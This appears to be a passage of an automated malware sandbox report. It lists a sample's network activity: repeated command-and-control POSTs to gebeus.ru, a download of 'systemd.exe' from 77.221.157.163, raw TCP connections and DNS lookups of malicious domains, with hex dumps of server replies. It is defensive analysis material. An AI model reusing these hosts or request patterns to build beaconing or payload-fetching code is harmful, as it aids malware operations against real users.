      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jklgsoopefuhj.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 301Host: gebeus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://cjmjmjmgugawaqj.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 141Host: gebeus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hurkgkiufjdhatw.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 244Host: gebeus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://twuefpujaurvfca.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 122Host: gebeus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ewsnnfxrccp.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 163Host: gebeus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://aeqbmojsaplkjy.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 329Host: gebeus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://qhngbjsxhdjts.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 163Host: gebeus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://vahxvallvgf.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 251Host: gebeus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://evdyuckmovmlgw.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 253Host: gebeus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://yxdvfnljluug.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 253Host: gebeus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hocvueqllial.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 126Host: gebeus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://kojxnjsmgyh.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 363Host: gebeus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://woemrmcgjefexq.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 338Host: gebeus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://wkabmnjjuon.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 184Host: gebeus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ifgnsbejriuwteg.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 190Host: gebeus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://dxpeojjvxfrbjrw.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 251Host: gebeus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://rklgpmbjqrvbpp.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 316Host: gebeus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ddxjeoahbwmlur.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 275Host: gebeus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://gdirqpperuo.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 264Host: gebeus.ru
      Source: unknownTCP traffic detected without corresponding DNS query: 77.221.157.163
      Source: unknownTCP traffic detected without corresponding DNS query: 77.221.157.163
      Source: unknownTCP traffic detected without corresponding DNS query: 77.221.157.163
      Source: unknownTCP traffic detected without corresponding DNS query: 77.221.157.163
      Source: unknownTCP traffic detected without corresponding DNS query: 46.246.96.149
      Source: unknownTCP traffic detected without corresponding DNS query: 46.246.96.149
      Source: unknownTCP traffic detected without corresponding DNS query: 46.246.96.149
      Source: unknownTCP traffic detected without corresponding DNS query: 46.246.96.149
      Source: unknownTCP traffic detected without corresponding DNS query: 46.246.96.149
      Source: unknownTCP traffic detected without corresponding DNS query: 46.246.96.149
      Source: unknownTCP traffic detected without corresponding DNS query: 46.246.96.149
      Source: unknownTCP traffic detected without corresponding DNS query: 46.246.96.149
      Source: unknownTCP traffic detected without corresponding DNS query: 46.246.96.149
      Source: unknownTCP traffic detected without corresponding DNS query: 46.246.96.149
      Source: unknownTCP traffic detected without corresponding DNS query: 46.246.96.149
      Source: unknownTCP traffic detected without corresponding DNS query: 46.246.96.149
      Source: unknownTCP traffic detected without corresponding DNS query: 46.246.96.149
      Source: unknownTCP traffic detected without corresponding DNS query: 46.246.96.149
      Source: unknownTCP traffic detected without corresponding DNS query: 46.246.96.149
      Source: unknownTCP traffic detected without corresponding DNS query: 46.246.96.149
      Source: unknownTCP traffic detected without corresponding DNS query: 46.246.96.149
      Source: unknownTCP traffic detected without corresponding DNS query: 46.246.96.149
      Source: unknownTCP traffic detected without corresponding DNS query: 46.246.96.149
      Source: unknownTCP traffic detected without corresponding DNS query: 46.246.96.149
      Source: unknownTCP traffic detected without corresponding DNS query: 46.246.96.149
      Source: unknownTCP traffic detected without corresponding DNS query: 46.246.96.149
      Source: unknownTCP traffic detected without corresponding DNS query: 46.246.96.149
      Source: unknownTCP traffic detected without corresponding DNS query: 46.246.96.149
      Source: unknownTCP traffic detected without corresponding DNS query: 46.246.96.149
      Source: unknownTCP traffic detected without corresponding DNS query: 46.246.96.149
      Source: unknownTCP traffic detected without corresponding DNS query: 46.246.96.149
      Source: unknownTCP traffic detected without corresponding DNS query: 46.246.96.149
      Source: unknownTCP traffic detected without corresponding DNS query: 46.246.96.149
      Source: unknownTCP traffic detected without corresponding DNS query: 46.246.96.149
      Source: unknownTCP traffic detected without corresponding DNS query: 46.246.96.149
      Source: unknownTCP traffic detected without corresponding DNS query: 46.246.96.149
      Source: unknownTCP traffic detected without corresponding DNS query: 46.246.96.149
      Source: unknownTCP traffic detected without corresponding DNS query: 46.246.96.149
      Source: unknownTCP traffic detected without corresponding DNS query: 46.246.96.149
      Source: unknownTCP traffic detected without corresponding DNS query: 46.246.96.149
      Source: unknownTCP traffic detected without corresponding DNS query: 46.246.96.149
      Source: unknownTCP traffic detected without corresponding DNS query: 46.246.96.149
      Source: unknownTCP traffic detected without corresponding DNS query: 46.246.96.149
      Source: unknownTCP traffic detected without corresponding DNS query: 46.246.96.149
      Source: unknownTCP traffic detected without corresponding DNS query: 46.246.96.149
      Source: unknownTCP traffic detected without corresponding DNS query: 46.246.96.149
      Source: unknownTCP traffic detected without corresponding DNS query: 46.246.96.149
      Source: unknownTCP traffic detected without corresponding DNS query: 46.246.96.149
      Source: unknownTCP traffic detected without corresponding DNS query: 46.246.96.149
      Source: unknownTCP traffic detected without corresponding DNS query: 46.246.96.149
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifCode function: 19_2_00C6279E InternetReadFile,InternetQueryDataAvailable,InternetReadFile,19_2_00C6279E
      Source: global trafficHTTP traffic detected: GET /wp-content/images/pic1.jpg HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: mussangroup.com
      Source: global trafficHTTP traffic detected: GET /systemd.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 77.221.157.163
      Source: global trafficDNS traffic detected: DNS query: evilos.cc
      Source: global trafficDNS traffic detected: DNS query: gebeus.ru
      Source: global trafficDNS traffic detected: DNS query: mussangroup.com
      Source: global trafficDNS traffic detected: DNS query: FibtGXfABKPepIBYktzWGsNQQZ.FibtGXfABKPepIBYktzWGsNQQZ
      Source: unknownHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://qydxnaxywntsme.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 126Host: gebeus.ru
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 15 Jul 2024 04:10:35 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 04 00 00 00 72 e8 85 ef Data Ascii: r
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 15 Jul 2024 04:10:37 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 15 Jul 2024 04:10:39 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 15 Jul 2024 04:10:41 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 15 Jul 2024 04:10:42 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 15 Jul 2024 04:10:44 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 15 Jul 2024 04:10:45 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 15 Jul 2024 04:10:47 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 15 Jul 2024 04:10:48 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 d0 9e 5c 2e 5c 24 14 a6 69 44 aa ad 10 bd cf b4 f9 6d 87 37 c6 ec 26 57 11 c2 8f 97 cb Data Ascii: #\.\$iDm7&W
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 15 Jul 2024 04:11:09 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 15 Jul 2024 04:11:12 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 99 8b 5c 36 06 7f 55 e7 39 04 fc ea 48 e6 8e ac a9 2d 99 61 c2 e8 6e 59 1a 82 9e 8a c0 70 9b 37 18 12 98 07 99 16 76 5a 57 ec d5 7f e5 7c Data Ascii: #\6U9H-anYp7vZW|
